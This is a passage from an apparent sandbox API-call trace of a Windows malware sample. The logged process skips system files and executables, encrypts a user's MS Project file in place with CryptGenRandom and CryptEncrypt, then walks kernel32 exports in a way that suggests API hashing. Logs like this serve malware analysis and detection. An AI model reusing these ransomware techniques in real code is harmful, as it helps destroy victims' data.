(lpString1="Global.MPT", lpString2="ntuser.dat") returned -1 [0078.004] lstrcmpiW (lpString1="Global.MPT", lpString2="iconcache.db") returned -1 [0078.004] lstrcmpiW (lpString1="Global.MPT", lpString2="bootsect.bak") returned 1 [0078.004] lstrcmpiW (lpString1="Global.MPT", lpString2="ntuser.dat.log") returned -1 [0078.004] lstrcmpiW (lpString1="Global.MPT", lpString2="thumbs.db") returned -1 [0078.004] lstrcmpiW (lpString1="Global.MPT", lpString2="Bootfont.bin") returned 1 [0078.004] lstrlenW (lpString="Global.MPT") returned 10 [0078.004] lstrcmpiW (lpString1="MPT", lpString2="lnk") returned 1 [0078.004] lstrcmpiW (lpString1="MPT", lpString2="exe") returned 1 [0078.004] lstrcmpiW (lpString1="MPT", lpString2="sys") returned -1 [0078.004] lstrcmpiW (lpString1="MPT", lpString2="dll") returned 1 [0078.004] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0078.004] lstrlenW (lpString="Global.MPT") returned 10 [0078.004] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" [0078.005] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpString2="Global.MPT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" [0078.005] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.005] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0078.005] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=390656) returned 1 [0078.005] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0078.005] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x12a0000 [0078.009] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.009] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.009] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.011] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0078.012] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.022] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.023] UnmapViewOfFile (lpBaseAddress=0x12a0000) returned 1 [0078.026] CloseHandle (hObject=0x464) returned 1 [0078.026] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.026] WriteFile (in: hFile=0x460, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0078.027] CloseHandle (hObject=0x0) returned 0 [0078.027] CloseHandle (hObject=0x460) returned 1 [0078.032] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.033] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.033] GetTickCount () returned 0x114c024 [0078.033] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.033] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.033] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.033] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.034] lstrlenA (lpString="kernel32.dll") returned 12 [0078.034] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.034] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.034] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.034] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.034] lstrlenA (lpString="ADDATOMA") returned 8 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.034] lstrlenA (lpString="ADDATOMW") returned 8 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.034] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.034] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.034] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.034] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.034] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.034] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.035] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.035] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.035] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.035] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.035] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.035] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.035] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.035] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.035] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.035] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.035] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.035] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.035] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.035] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.035] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.035] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.035] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.035] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.035] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.036] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.036] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.036] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.036] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.036] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.036] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.036] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.036] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.036] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.036] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.036] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.036] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.036] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.036] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.036] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.036] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.036] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.036] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.037] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.037] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.037] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.037] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.037] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.037] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.037] lstrlenA (lpString="BEEP") returned 4 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.037] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.037] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.037] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.037] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.037] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.037] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.037] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.037] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.037] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.037] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.037] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.037] lstrlenA (lpString="CANCELIO") returned 8 [0078.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.038] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.038] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.038] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.038] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.038] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.038] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.038] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.038] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.038] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.038] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.038] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.038] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.038] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.038] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.038] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.038] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.038] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.038] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.038] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.038] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.039] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.039] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.039] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.039] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.039] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.039] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.039] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.039] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.039] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.039] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.039] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.039] lstrcpyA (in: lpString1=0x3f2c7fc, 